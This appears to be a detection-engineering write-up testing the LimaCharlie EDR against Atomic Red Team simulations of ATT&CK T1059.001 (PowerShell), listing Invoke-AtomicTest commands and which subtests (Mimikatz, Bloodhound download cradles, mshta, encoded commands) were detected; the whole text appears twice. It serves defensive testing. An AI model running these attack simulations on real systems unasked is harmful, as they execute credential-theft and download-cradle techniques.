CYBERSECURITY JOB HUNTING GUIDE
T1059.001 PowerShell
Author: Stefan Waldvogel
LimaCharlie vs. different PowerShell commands
Overview:
Description from ATT&CK
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
Invoke-AtomicTest T1059.001 -CheckPrereqs
Invoke-AtomicTest T1059.001 -GetPrereqs
Invoke-AtomicTest T1059.001 -TestNumbers 1
Invoke-AtomicTest T1059.001 -Cleanup
Changes:
-none-
Limitations:
A special version of a .NET was not installed.
TestNumber 10 did not work
Results:
This section has 16 subtests.
Mimikatz: multiple detections
Bloodhound: sigma, detected
Bloodhound with download cradle: sigma, detected
Obfuscation with Mimikatz: sigma, detected suspicious PS and the download cradle
Mimikatz Cradlecraft PsSendKeys: Detected Mimikatz and WebDav Client execution.
Invoke-AppPathBypass: detected as Sdclt Child Processes
Invoke-AtomicTest T1059.001 -TestNumbers 7 Powershell MsXml COM: detected the Powershell, but sigma did not not the download cradle, changed to soteria -> detected
Invoke-AtomicTest T1059.001 -TestNumbers 8 PowerShell XML request: detected the Powershell, but sigma did not the download cradle, changed to soteria -> detected
PowerShell invoke mshta.exe: detected as MSHTA Spawning Windows Shell and different techmiques
-10 look buggy
PowerShell Fileless script execution: detected as FromBase64String Command Line
-11 needs .NET v2.0.50727 (not installed)
-12 needs .NET v2.0.50727 (not installed)
NTFS Alternate Data Stream: detected as Run PowerShell Script from ADS
PowerShell Session Creation and Use: detected as Remote PowerShell Session Host Process (WinRM)
ATHPowerShellCommandLineParameter: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
Description from ATT&CK
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
Invoke-AtomicTest T1059.001 -CheckPrereqs
Invoke-AtomicTest T1059.001 -GetPrereqs
Invoke-AtomicTest T1059.001 -TestNumbers 1
Invoke-AtomicTest T1059.001 -Cleanup
Changes:
-none-
Limitations:
A special version of a .NET was not installed.
TestNumber 10 did not work
Results:
This section has 16 subtests.
Mimikatz: multiple detections
Bloodhound: sigma, detected
Bloodhound with download cradle: sigma, detected
Obfuscation with Mimikatz: sigma, detected suspicious PS and the download cradle
Mimikatz Cradlecraft PsSendKeys: Detected Mimikatz and WebDav Client execution.
Invoke-AppPathBypass: detected as Sdclt Child Processes
Invoke-AtomicTest T1059.001 -TestNumbers 7 Powershell MsXml COM: detected the Powershell, but sigma did not not the download cradle, changed to soteria -> detected
Invoke-AtomicTest T1059.001 -TestNumbers 8 PowerShell XML request: detected the Powershell, but sigma did not the download cradle, changed to soteria -> detected
PowerShell invoke mshta.exe: detected as MSHTA Spawning Windows Shell and different techmiques
-10 look buggy
PowerShell Fileless script execution: detected as FromBase64String Command Line
-11 needs .NET v2.0.50727 (not installed)
-12 needs .NET v2.0.50727 (not installed)
NTFS Alternate Data Stream: detected as Run PowerShell Script from ADS
PowerShell Session Creation and Use: detected as Remote PowerShell Session Host Process (WinRM)
ATHPowerShellCommandLineParameter: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
© 2021. This work is licensed under a CC BY-SA 4.0 license